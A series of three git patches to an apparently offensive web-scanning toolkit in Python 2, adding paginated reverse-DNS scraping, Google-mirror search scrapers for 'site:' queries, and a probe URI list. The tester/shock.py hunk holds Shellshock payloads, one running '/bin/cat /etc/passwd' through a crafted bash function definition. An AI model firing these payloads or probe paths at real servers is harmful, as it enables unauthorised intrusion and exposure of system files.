From 01d75d023b546e6fd650ad52fd2ab8bd97b9ceb3 Mon Sep 17 00:00:00 2001 From: xiao Date: Thu, 2 Jul 2015 09:19:00 +0800 Subject: [PATCH 1/3] ZZchanged --- gather.py | 24 +++++++++++++++--------- tester/shock.py | 2 +- uris.txt | 1 + utils/__init__.py | 2 +- utils/webutils.py | 2 +- 5 files changed, 19 insertions(+), 12 deletions(-) diff --git a/gather.py b/gather.py index bea7b27..f8ebaed 100755 --- a/gather.py +++ b/gather.py @@ -87,15 +87,21 @@ def queryRDNS_old(domain): def queryRDNS(domain): hostInfos = socket.gethostbyname_ex(domain) #r = (hostname, aliaslist, ipaddrlist) for ipaddr in hostInfos[2]: - try: - response = urllib2.urlopen('http://dns.aizhan.com/%s/' % (ipaddr)) - text = response.read() - tree = etree.HTML(text) - nodes = tree.xpath(r"//td[@class='dns-links']/a/@href") - for node in nodes: - print node - except Exception, e: - print e + + print '[IP Address: ' + ipaddr + ']' + # TODO: 加入翻页代码 + for i in range(5): # 最多5页,需要更多到网页上去看 + try: + response = urllib2.urlopen('http://dns.aizhan.com/%s/%d/' % (ipaddr, i)) + text = response.read() + tree = etree.HTML(text) + nodes = tree.xpath(r"//td[@class='dns-links']/a/@href") + if len(nodes) == 0: + break + for node in nodes: + print node, getTitle(node) + except Exception, e: + print e def toStr(l): diff --git a/tester/shock.py b/tester/shock.py index 9cf1716..c211b49 100644 --- a/tester/shock.py +++ b/tester/shock.py @@ -15,7 +15,7 @@ EXPLOIT1 = '() { :;};a=`/bin/cat /etc/passwd`;echo $a' SLEEP_TIME = 7 -EXPLOIT2 = '() { :;}; /bin/sleep %s' % SLEEP_TIME +EXPLOIT2 = '() { :;}; /bin/sleep %d' % SLEEP_TIME #env -i X='() { (a)=>\' bash -c 'echo date'; cat echo #无漏洞的输出: diff --git a/uris.txt b/uris.txt index a165576..bf2e8aa 100644 --- a/uris.txt +++ b/uris.txt @@ -1,3 +1,4 @@ /uc_server/control/admin/db.php /source/plugin/myrepeats/table/table_myrepeats.php /install/include/install_lang.php +/cgi-bin/test-cgi diff --git a/utils/__init__.py b/utils/__init__.py index a9242a2..7f5167f 100755 --- a/utils/__init__.py +++ b/utils/__init__.py @@ -1 +1 @@ -__all__ = ['webutils', 'google'] +__all__ = ['webutils', 'google', 'crawler'] diff --git a/utils/webutils.py b/utils/webutils.py index a3163f1..78365c4 100644 --- a/utils/webutils.py +++ b/utils/webutils.py @@ -129,7 +129,7 @@ def getPageTitle(opener, url): return '' try: - if url[:7] != 'http://': + if url[:7] != 'http://' and url[:8] != 'https://': url = 'http://' + url req = urllib2.Request(url) setupRequest(req) From 207f177b367bf351373283524322fb3b52f7be52 Mon Sep 17 00:00:00 2001 From: xiao Date: Mon, 12 Oct 2015 19:13:05 +0800 Subject: [PATCH 2/3] new search base --- utils/googto.py | 41 +++++++++++++++++++ utils/searchbase.py | 99 +++++++++++++++++++++++++++++++++++++++++++++ 2 files changed, 140 insertions(+) create mode 100755 utils/googto.py create mode 100644 utils/searchbase.py diff --git a/utils/googto.py b/utils/googto.py new file mode 100755 index 0000000..809c660 --- /dev/null +++ b/utils/googto.py @@ -0,0 +1,41 @@ +# -*- encoding: utf-8 -*- + +import searchbase +import re +import urllib, urllib2 +import webutils +from lxml import etree + +class Googto(searchbase.SearchBase): + + _totalRecordPattern = re.compile(r'找到约 ([0-9,]+) 条结果') + + def _updateTotalRecord(self, html): + m = self._totalRecordPattern.search(html) + if m == None: + # print '* Not found 1' + return + if len(m.groups()) <= 0: + # print '* Not found 2' + return + self._totalRecord = int(m.group(1).replace(',', '')) + print '* Total:', self._totalRecord + + + def _pickupLinks(self, html): + tree = etree.HTML(html) + # nodes = tree.xpath(r'/html/body/table[2]/tbody/tr[2]/td[2]/ol/div + return tree.xpath(r'//h3/a/@href') + + + def _genUrl(self, what, start): + return 'http://www.googto.com/?q=%s&start=%d' % (what, start) + +if __name__ == '__main__': + opener = urllib2.build_opener() + webutils.setupOpener(opener) + googto = Googto(opener) + + for url in googto.search('site:letv.com', 10): + print url + diff --git a/utils/searchbase.py b/utils/searchbase.py new file mode 100644 index 0000000..acca718 --- /dev/null +++ b/utils/searchbase.py @@ -0,0 +1,99 @@ +# -*- encoding: utf-8 -*- + +import urllib2 +import sys +import os +import webutils + +class SearchBase: + + _opener = None + _totalRecord = sys.maxint + + reqTimeout = 20 + + def __init__(self, opener): + self._opener = opener + + # TODO: get total record number from page + def _updateTotalRecord(self, html): + pass + + # TODO: pick up links from page + def _pickupLinks(self, html): + pass + + def _pageHandler(self, url): + # print 'page handler' + req = urllib2.Request(url) + webutils.setupRequest(req) + req.add_header('Referer', url[:-4]) + + try: + response = self._opener.open(req, timeout = self.reqTimeout) + html = response.read() + # print html + except Exception, e: + print "Exception: url: %s - " % url, e + raise StopIteration() + + if self._totalRecord == sys.maxint: + self._updateTotalRecord(html) + + for url in self._pickupLinks(html): + yield url + + # TODO: return number of results per page. default is 10 + def _getNumPerPage(self): + return 10 + + # TODO: generate a url for searching + def _genUrl(self, what, start): + return '' + + def search(self, what, resultNum = -1, startNum = 0): + + numPerPage = self._getNumPerPage(); + + if resultNum == -1: + pageCount = -1 + else: + pageCount = int((resultNum + numPerPage - 1) / numPerPage) + + startPage = int((startNum + numPerPage - 1) / numPerPage) + + self._totalRecord = sys.maxint + + what = urllib2.quote(what) + + pageNum = 1 + resCnt = 0 + + while True: + if pageCount != -1: + if pageNum > pageCount: + break + + url = self._genUrl(what, (startPage + pageNum) * numPerPage) + + for result in self._pageHandler(url): + resCnt += 1 + yield result + if resultNum != -1 and resCnt >= resultNum: + raise StopIteration() + if resCnt >= totalRecord: + raise StopIteration() + + if self._totalRecord == sys.maxint: + if resultNum == -1: + totalRecord = sys.maxint - 1 + else: + totalRecord = resultNum + + if resCnt >= self._totalRecord: + raise StopIteration() + #if i < numPerPage: # FIXME: if the result total is 10... :( + # raise StopIteration() + # break + pageNum += 1 + From 6a9715f24af660d619fc37176c5b612050a353c4 Mon Sep 17 00:00:00 2001 From: xiao Date: Mon, 12 Oct 2015 20:23:52 +0800 Subject: [PATCH 3/3] ZZadd hxgoogle2.py --- utils/google.py | 8 ++++++- utils/hxgoogle.py | 4 ++-- utils/hxgoogle2.py | 54 +++++++++++++++++++++++++++++++++++++++++++++ utils/hxgoogle3.py | 54 +++++++++++++++++++++++++++++++++++++++++++++ utils/searchbase.py | 9 ++++---- 5 files changed, 122 insertions(+), 7 deletions(-) create mode 100755 utils/hxgoogle2.py create mode 100755 utils/hxgoogle3.py diff --git a/utils/google.py b/utils/google.py index 4af1b59..5a0b9e0 100644 --- a/utils/google.py +++ b/utils/google.py @@ -4,6 +4,8 @@ import googlesearch import bingsearch import hxgoogle +import hxgoogle2 +import hxgoogle3 #searchEngine = googlesearch.google #searchEngine = aolsearch.google @@ -24,8 +26,12 @@ google = bingsearch.google elif search_engine == 'hxgoogle': google = hxgoogle.google +elif search_engine == 'hxgoogle2': + google = hxgoogle2.google +elif search_engine == 'hxgoogle3': + google = hxgoogle3.google else: - google = hxgoogle.google + google = hxgoogle2.google searchEngine = google diff --git a/utils/hxgoogle.py b/utils/hxgoogle.py index 872f83c..f50927c 100644 --- a/utils/hxgoogle.py +++ b/utils/hxgoogle.py @@ -11,7 +11,7 @@ import locale import webutils -HXGOOGLE_HOME = 'http://www.hxgoogle.com' +HXGOOGLE_HOME = 'http://g.hxgoogle.com' NUM_PER_PAGE = 10 REQ_TIMEOUT = 20 totalRecord = sys.maxint @@ -82,7 +82,7 @@ def _hxSearch(opener, what, resultNum = -1, startNum = 0): if pageCount != -1: if pageNum > pageCount: break - url = HXGOOGLE_HOME + '/search.jsp?q=%s&newwindow=1&safe=off&noj=1&hl=zh-CN&start=%d&sa=N' % (what, (startPage + pageNum) * 10) + url = HXGOOGLE_HOME + '/search.jsp?q=%s&newwindow=1&safe=off&noj=1&hl=zh-CN&start=%d&sa=N' % (what, (startPage + pageNum - 1) * 10) for result in _hxPageHandler(opener, url): # i += 1 diff --git a/utils/hxgoogle2.py b/utils/hxgoogle2.py new file mode 100755 index 0000000..adb9f3c --- /dev/null +++ b/utils/hxgoogle2.py @@ -0,0 +1,54 @@ +# -*- encoding: utf-8 -*- + +import searchbase +import re +import urllib, urllib2 +import webutils +from lxml import etree + +pattern = re.compile(r'
找到约 ([0-9,]+) 条结果') +pattern2 = re.compile(r'找不到和您的查询 ".*?" 相符的内容或信息。') + +class HxGoogle(searchbase.SearchBase): + + def _updateTotalRecord(self, html): + + m = pattern2.search(html) + if m != None: + self._totalRecord = 0 + #print 'not found' + return + m = pattern.search(html) + if m == None: + return + if len(m.groups()) <= 0: + return + self._totalRecord = int(m.group(1).replace(',', '')) + print 'Total: ', self._totalRecord + + def _pickupLinks(self, html): + tree = etree.HTML(html) + # nodes = tree.xpath(r'/html/body/table[2]/tbody/tr[2]/td[2]/ol/div + return tree.xpath(r'//h3/a/@href') + + + def _genUrl(self, what, start): + return 'http://g1.hxgoogle.com/search.jsp?q=%s&newwindow=1&safe=off&noj=1&hl=zh-CN&start=%d&sa=N' % (what, start) + + +hx = None + +def google(opener, what, resultNum = -1, startNum = 0): + global hx + if hx == None: + hx = HxGoogle(opener) + return hx.search(what, resultNum, startNum) + +if __name__ == '__main__': + opener = urllib2.build_opener() + webutils.setupOpener(opener) + # goo = HxGoogle(opener) + + for url in google(opener, 'site:letv.com', 20): + print url + diff --git a/utils/hxgoogle3.py b/utils/hxgoogle3.py new file mode 100755 index 0000000..7d0184b --- /dev/null +++ b/utils/hxgoogle3.py @@ -0,0 +1,54 @@ +# -*- encoding: utf-8 -*- + +import searchbase +import re +import urllib, urllib2 +import webutils +from lxml import etree + +pattern = re.compile(r'
找到约 ([0-9,]+) 条结果') +pattern2 = re.compile(r'找不到和您的查询 ".*?" 相符的内容或信息。') + +class HxGoogle(searchbase.SearchBase): + + def _updateTotalRecord(self, html): + + m = pattern2.search(html) + if m != None: + self._totalRecord = 0 + #print 'not found' + return + m = pattern.search(html) + if m == None: + return + if len(m.groups()) <= 0: + return + self._totalRecord = int(m.group(1).replace(',', '')) + print 'Total: ', self._totalRecord + + def _pickupLinks(self, html): + tree = etree.HTML(html) + # nodes = tree.xpath(r'/html/body/table[2]/tbody/tr[2]/td[2]/ol/div + return tree.xpath(r'//h3/a/@href') + + + def _genUrl(self, what, start): + return 'http://g2.hxgoogle.com/search.jsp?q=%s&newwindow=1&safe=off&noj=1&hl=zh-CN&start=%d&sa=N' % (what, start) + + +hx = None + +def google(opener, what, resultNum = -1, startNum = 0): + global hx + if hx == None: + hx = HxGoogle(opener) + return hx.search(what, resultNum, startNum) + +if __name__ == '__main__': + opener = urllib2.build_opener() + webutils.setupOpener(opener) + # goo = HxGoogle(opener) + + for url in google(opener, 'site:letv.com', 20): + print url + diff --git a/utils/searchbase.py b/utils/searchbase.py index acca718..dd3f74b 100644 --- a/utils/searchbase.py +++ b/utils/searchbase.py @@ -74,21 +74,22 @@ def search(self, what, resultNum = -1, startNum = 0): if pageNum > pageCount: break - url = self._genUrl(what, (startPage + pageNum) * numPerPage) + url = self._genUrl(what, (startPage + pageNum - 1) * numPerPage) + # print url for result in self._pageHandler(url): resCnt += 1 yield result if resultNum != -1 and resCnt >= resultNum: raise StopIteration() - if resCnt >= totalRecord: + if resCnt >= self._totalRecord: raise StopIteration() if self._totalRecord == sys.maxint: if resultNum == -1: - totalRecord = sys.maxint - 1 + self._totalRecord = sys.maxint - 1 else: - totalRecord = resultNum + self._totalRecord = resultNum if resCnt >= self._totalRecord: raise StopIteration()